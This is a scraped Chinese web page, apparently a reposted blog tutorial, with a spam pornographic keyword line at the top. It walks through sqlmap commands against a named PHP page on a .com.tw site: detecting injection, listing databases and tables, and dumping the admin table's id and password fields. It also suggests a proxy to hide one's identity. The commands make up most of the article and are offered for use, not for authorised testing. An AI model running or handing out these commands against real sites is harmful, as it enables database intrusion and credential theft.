亚洲爆乳精品无码一区,国产不卡二三区亚洲一二

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

sqlmap注入常見用法一條龍

sqlmap是一個灰常強大的sql注入檢測與輔助工具，但是由于沒有圖形界面，基本上用起來比較麻煩，導(dǎo)致很多人可能寧愿用havij或者是pangolin也不愿意麻煩去翻幫助界面，我自己也是把很多語句貼到了一個記事本里面用，其實真正用起來也就5,6句，也不會太復(fù)雜，下文以php+mysql為例：

檢查注入點sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

列數(shù)據(jù)庫信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

指定庫名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

指定庫名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

指定庫名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

有幾個參數(shù)可能會用到，直接加在***面就可以了，更多詳細(xì)參數(shù)見官方文檔：

--cookie=COOKIE 在需要登錄的地方，需要登錄后的cookie

--proxy="http://127.0.0.1:8087" 使用HTTP代理隱藏自己的身份，比如使用goagent等

--sql-query=QUERY 執(zhí)行一個sql語句，不一定支持

過程的幾張圖如下：

網(wǎng)頁名稱：sqlmap注入常見用法一條龍
本文來源：http://www.5511xx.com/article/djspddg.html

新聞中心

其他資訊